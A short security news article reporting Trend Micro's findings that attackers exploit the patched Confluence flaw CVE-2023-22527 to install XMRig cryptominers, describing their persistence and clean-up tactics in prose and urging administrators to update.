Cyber threat actors are now actively taking advantage of a critical vulnerability that has been recently patched in Atlassian Confluence Data Center and Confluence Server software. This vulnerability has been leveraged to facilitate unauthorized cryptocurrency mining on vulnerable systems.
According to Trend Micro’s researcher Abdelrahman Esmail, the attackers have employed various sophisticated techniques, including the deployment of shell scripts, utilization of XMRig miners, targeting of SSH endpoints, and the elimination of competing crypto mining processes. To maintain a foothold within the system, they have utilized cron jobs for persistence.
The exploited vulnerability is identified as CVE-2023-22527, which is classified as a critical severity issue in older iterations of the Confluence software. It allows unauthenticated attackers to execute remote code. Atlassian responded to this threat by issuing a patch in mid-January 2024.
Trend Micro has reported a spike in attempts to exploit this vulnerability during mid-June to late July 2024, with attackers utilizing it to deploy the XMRig miner on systems that have not been updated. Investigations indicate that at least three distinct groups may be orchestrating this malicious campaign.
One method employed involves launching the XMRig miner through a crafted ELF file payload activated by specific requests. Additionally, attackers use shell scripts that first terminate competing cryptojacking efforts, eliminate all cron jobs, uninstall security solutions from cloud service providers, and collect system data. Following this, a new cron job is established to connect to command-and-control servers every five minutes and initiate the miner.
The ongoing exploitation of CVE-2023-22527 signifies a profound security challenge for organizations across the globe, as highlighted by Esmail. Business administrators are urged to promptly update their Atlassian Confluence Data Center and Confluence Server instances to the latest versions to safeguard against potential threats linked to this significant vulnerability.
